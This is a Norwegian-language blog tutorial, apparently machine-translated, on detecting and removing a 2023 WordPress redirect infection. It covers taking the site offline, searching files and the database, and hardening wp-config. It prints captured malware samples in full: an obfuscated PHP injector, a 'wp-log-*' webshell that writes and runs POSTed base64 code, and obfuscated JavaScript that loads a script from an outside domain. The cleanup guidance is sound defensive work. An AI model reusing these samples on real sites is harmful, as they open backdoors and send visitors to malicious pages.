Fix Redirect WordPress Hack 2023 (VIRUS REDIRECT)

WordPress er definitivt den mest brukte plattformen CMS (Content Management System) For både blogger og online startbutikker (med WooCommerce -modulen), noe som gjør den til den mest målrettede av datamaskinangrep (hacking). En av de mest brukte hackingoperasjonene har som mål å omdirigere det kompromitterte nettstedet til andre websider. Redirect WordPress Hack 2023 er en relativt ny malware som påvirker for å omdirigere hele nettstedet til spam websider eller som igjen kan virus brukere datamaskiner.

Innhold

Hvis nettstedet ditt utviklet på WordPress blir omdirigert på et annet sted, er offeret allerede det berømte omdirigeringshanken.

I denne opplæringen finner du nødvendig informasjon og nyttige tips som du kan avskjedige et nettsted smittet med omdirigering WordPress Hack (Virus Redirect). Gjennom kommentarer kan du få tilleggsinformasjon eller be om hjelp.

Påvisning av virus som omdirigerer WordPress -nettsteder

Den plutselige og uberettigede nedgangen i trafikken på nettstedet, reduserer antall bestillinger (i tilfelle av nettbutikker) eller annonseringskvitteringer er de første tegnene på at noe ikke stemmer. Oppdagelse “Redirect WordPress Hack 2023” (Viderekobling virus) kan gjøres og “visuell” Når du åpner nettstedet, og du blir omdirigert til en annen webside.

Av erfaring er de fleste av web -malware -applikasjonene kompatible med nettlesere: Chrome, Firefox, Edge, Opera. Hvis du er en Mac -datamaskinbruker, er disse virusene ikke veldig synlige i Safari -nettleseren. Safari -sikkerhetssystemet blokkerer stilltiende disse ondsinnede skriptene.

Hva trenger du å gjøre hvis du har et WordPress Hack Word Hack Virus -nettsted

Jeg håper det første tiltaket ikke er å få panikk eller slette nettstedet. Ikke engang virus- eller virusfilene skal slettes i første fase. De inneholder verdifull informasjon som kan hjelpe deg med å forstå hvor sikkerhetsbruddet er og hva viruset har påvirket. Modus operandi.

Lukk nettstedet for publikum.

Hvordan lukker du et virusnettsted for besøkende? Det enkleste er å bruke DNS -sjefen og slette IP -en for “EN” (Domenenavn) eller definere en ikke-eksisterende IP. Dermed vil de besøkende på nettstedet bli beskyttet mot dette omdirigerte WordPress -hacket som kan ta dem på virus eller spam websider.

Hvis du bruker CloudFlare Som DNS Manager autentiserer du på kontoen din og sletter DNS -postene “A” for domenenavnet. Dermed vil området som er berørt av viruset forbli uten IP, og ikke kunne få tilgang til fra internett.

Kopier IP -en på nettstedet og gjør “rute” For å kunne få tilgang til bare deg. Fra datamaskinen din.

Hvordan endrer du den virkelige IP -en til et nettsted på Windows Computers?

Metoden brukes ofte til å blokkere tilgang til visse nettsteder ved å redigere filen “verter”.

1. Åpne Notisblokk eller annen tekstredigerer (med administratorrettigheter) og rediger filen “hosts“. Det ligger i:

C:\Windows\System32\drivers\etc\hosts

2. i filen “verter” legge til “rute” til den virkelige IP -en på nettstedet ditt. IP slettet ovenfor fra DNS Manager.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Lagre filen og tilgang til nettstedet i nettleseren.

Hvis nettstedet ikke åpnes og du ikke gjorde en feil i filen “verter”, er mest sannsynlig en DNS -cache.

For å slette DNS -hurtigbufferen på et Windows -operativsystem, åpent ledetekst, der du utfører ordren:

ipconfig /flushdns

Hvordan endrer du den virkelige IP -en til et nettsted på Mac / MacBook -datamaskiner?

For MAC -datamaskinbrukere er det litt lettere å endre den virkelige IP -en på et nettsted.

1. Åpne verktøyet Terminal.

2. Utfør kommandolinjen (krever systempassord for utførelse):

sudo nano /etc/hosts

3. Når det gjelder Windows -datamaskiner, legg til den virkelige IP -en til domenet.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Lagre endringene. Ctrl+X (y).

Etter at du har gjort det “rute”, Du er den eneste personen som får tilgang til WordPress Hack Word Hack Virus -nettstedet.

Full sikkerhetskopi – Filer og database

Selv om det er virus med “omdirigere WordPress -hack”, Anbefalingen er å lage en generell sikkerhetskopi av hele nettstedet. Filer og database. Muligens kan du lagre en lokal kopi av begge filene i public / public_html så vel som databasen.

Identifisering av virus og modifiserte filer av omdirigering av WordPress Hack 2023

Hovedmålfilene til WordPress Jeg er index.php (ved roten), header.php, index.php og footer.php av det WordPress -aktive temaet. Kontroller disse filene manuelt og identifiser en malicidkode eller et skadelig programvare.

I 2023, et typevirus “Omdirigere WordPress -hack” Sett inn index.php en formkode:

(Jeg anbefaler ikke at du utfører disse kodene!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Avkodet, dette Skript malware Det er praktisk talt konsekvensen av WordPress -nettstedet. Det er ikke skriptet som er grunnlaget for malware -applikasjonen, men det er skriptet som gjør det mulig å omdirigere virus -websiden. Hvis vi avkoder skriptet over, får vi:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Som å indikere alle filene på serveren som inneholder denne koden, er det bra å ha tilgang SSH til serveren for å kjøre sjekk- og administrasjonsfiler på Linux.

Relatert: Hvordan finner du om du har en virusblogg eller ikke, ved hjelp av Google -søk. (WordPress -virus)

Nedenfor er to kommandoer som absolutt er nyttige for å identifisere nylig endrede filer og filer som inneholder en bestemt kode (streng).

Hvordan ser du PHP -filene endret i løpet av det siste døgnet eller i et annet tidsrom på Linux?

Kommando “find” Det er veldig enkelt å bruke og tillater personalisering å angi tidsperioden, lappen der søket og typen filer er laget i.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

I utdata vil du motta informasjon om datoen og klokkeslettet som filen ble endret, skrive / lese / utføre tillatelser (chmod) og hvis gruppe / bruker hører hjemme.

Hvis du vil sjekke for flere dager siden, kan du endre verdien “-mtime -1” eller bruk “-mmin -360” i minutter (6 timer).

Hvordan leter du etter en kode (streng) i PHP -filer, Java?

Kommandolinje “finne” Som du raskt kan finne alle PHP- eller Java -filer som inneholder en bestemt kode, er som følger:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Bestilling vil søke og vise filer .php og .js inneholder “uJjBRODYsU“.

Ved hjelp av de to ordrene ovenfor vil du enkelt finne ut hvilke filer som er endret i det siste og inneholder malware -kode.

Fjerner skadelig programvare fra de endrede filene uten at det går ut over riktig kode. I mitt scenario ble malware -koden plassert før åpningen <head>.

Ved utførelsen av den første ordren “finne” Det er veldig mulig å oppdage nye filer på serveren, som ikke er WordPress eller lagt der. Filer som forkynner WordPress Hack Redirect -viruset.

I scenariet som ble undersøkt av meg, dukket skjemafilene opp på serveren “wp-log-nOXdgD.php“. Dette er filer “generasjon” som også inneholder malware -kode som brukes av omdirigeringsviruset.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Formålet med typefiler “wp-log-*” Det er for å spre det omdirigerte hackviruset og andre nettsteder som er vert på serveren. Er en type malware -kode “webshell” sammensatt av en Grunnleggende seksjon (der noen krypterte variabler er definert) og O Utførelsesdel som angriperen prøver å laste og utføre en skadelig programvarekode i systemet.

Hvis det er en variabel POST ringte ‘bh‘ og dens krypterte verdi MD5 er lik “8f1f964a4b4d8d1ac3f0386693d28d03“, så ser man ut skriptet ut til å skrive det krypterte innholdet base64 av en annen variabel kalt ‘b3‘ I en midlertidig fil og prøv deretter å inkludere denne midlertidige filen.

Hvis det er en variabel POST eller GET ringte ‘tick'Skriptet vil svare med verdien MD5 av strengen “885“.

For å identifisere alle filene på serveren som inneholder denne koden, velger du en streng som er vanlig, og kjør deretter kommandoen til “find” (ligner på ovennevnte). Slett alle filer som inneholder denne malware -koden.

Sikkerhetsbrudd som drives av Redirect WordPress Hack

Mest sannsynlig når dette viderekoblingsviruset gjennom WordPress Administration Brukerutnyttelse eller ved å identifisere en Sårbar plugin som tillater tillegg av brukere med administratorrettigheter.

For de fleste nettsteder som er bygget på WordPress -plattformen er mulig Redigering av temaer for temaer eller plugintil administrasjonsgrensesnittet (Dashboard). Dermed kan en ondsinnet person legge til filene til temaet malware som genererer skriptene presentert ovenfor.

Et eksempel på slik skadelig programvare er dette:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identifisert i WordPress Theme Header, umiddelbart etter åpning av etiketten <head>.

Det er ganske vanskelig å dekryptere dette JavaScript, men det er åpenbart at en annen nettadresse mest sannsynlig vil bringe andre skript for å lage filer “wp-log-*” som jeg snakket ovenfor.

Søk og slett denne koden fra alle filer PHP berørt.

Så vidt jeg kunne finne ut at denne koden var manuelt lagt til av en ny bruker med administrative privilegier.

Så for å forhindre tillegg av skadelig programvare i dashbord, er det best å deaktivere WordPress / Plugins i Dashboard.

Rediger filen wp-config.php og legg til linjene:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Etter at du har gjort denne endringen, vil ingen WordPress -bruker kunne redigere dashbordfiler.

Sjekk brukere med administratorens rolle

Nedenfor er en SQL -spørring du kan bruke til å søke på brukere med administrator på WordPress -plattformen:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Denne spørringen vil returnere alle brukere i tabellen wp_users som tilskrev rollen som administrator. Spørringen er gjort for tabellen wp_usermeta å søke i meta ‘wp_capabilities', Som inneholder informasjon om rollene til brukere.

En annen metode er å identifisere dem fra: Dashboard → Users → All Users → Administrator. Men jeg praktiserer en bruker kan være skjult i dashbordpanelet. Så den beste måten å se brukere “Administrator” WordPress er SQL -kommandoen ovenfor.

I mitt tilfelle identifiserte jeg meg i databasen brukeren med navnet “wp-import-user“. Ganske suggererende.

Herfra kan du se datoen og klokkeslettet da WordPress -brukeren ble opprettet. Brukeren av brukeren er også veldig viktig fordi han så i serverloggene. På denne måten kan du se all aktiviteten til denne brukeren.

Slett brukere med administratorens rolle som du ikke vet det da Endre passordene dine til alle administrative brukere. Redaktør, forfatter, administrator.

Endre SQL -brukerens passord til databasen av det berørte nettstedet.

Etter å ha tatt disse trinnene, kan nettstedet startes på nytt for alle brukere.

Merk imidlertid at det jeg presenterte ovenfor er en av de tusenvis av spytte som et nettsted er med omdirigering av WordPress Hack i 2023.

Hvis nettstedet ditt har vært virus og trenger hjelp, eller hvis du har noen bekymringer, er kommentarfeltet åpen.